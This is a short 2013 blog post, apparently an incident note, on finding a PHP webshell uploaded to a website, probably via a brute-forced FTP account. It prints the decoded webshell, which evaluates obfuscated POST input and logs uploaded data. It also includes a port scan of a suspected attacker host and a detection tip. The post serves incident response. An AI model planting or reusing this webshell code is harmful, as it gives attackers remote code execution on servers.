Thursday, January 24, 2013

Discovery of Webshell on Website

Discovered unknown php files located on a website.
When php file contains eval + gzinflate + base64_decode expect it to be malicious in nature.

eval gzinflate base64_decode PHP decoder:

After decoding the file, we get a webshell with fileupload capability.
if (isset($_GET['r'])) { print $_GET['r']; }
elseif (isset($_POST['e'])) { eval(base64_decode(str_rot13(strrev(base64_decode(str_rot13($_POST['e'])))))); }
elseif (isset($_SERVER['HTTP_CONTENT_ENCODING']) && $_SERVER['HTTP_CONTENT_ENCODING'] == 'binary') { $data = file_get_contents('php://input'); if (strlen($data) > 0) print 'STATUS-IMPORT-OK'; if (strlen($data) > 12) { $fp=@fopen('tmpfile','a'); @flock($fp, LOCK_EX); @fputs($fp, $_SERVER['REMOTE_ADDR']."\t".base64_encode($data)."\r\n"); @flock($fp, LOCK_UN); @fclose($fp); } } exit;

Updates 25 Jan 2013:
Findings from log indicates that 3 months ago someone from uploaded the webshell using ftp account.
Possibility of entry from ftp brute force is very high as i know the original password is not that complex. is a webserver under construction.
Host is up (0.30s latency).
21/tcp   open  ftp          ProFTPD
25/tcp   open  smtp         Exim smtpd
80/tcp   open  http         Apache httpd
110/tcp  open  pop3         Dovecot pop3d
137/tcp  open  netbios-ns?
138/tcp  open  netbios-dgm?
139/tcp  open  netbios-ssn?
143/tcp  open  imap         Dovecot imapd
465/tcp  open  ssl/smtp     Exim smtpd 4.X
587/tcp  open  smtp         Exim
993/tcp  open  ssl/imap     Dovecot imapd
995/tcp  open  ssl/pop3     Dovecot pop3d
2195/tcp open  unknown
3306/tcp open  mysql        MySQL 5.5.28-1~dotdeb.0-log could just be another victim of the intruder.

Change password.
Monitor files.

1 comment:

  1. Just came across the same EXACT thing on a client site. The code was not really well hidden. It was in the web root with the filename "default.php".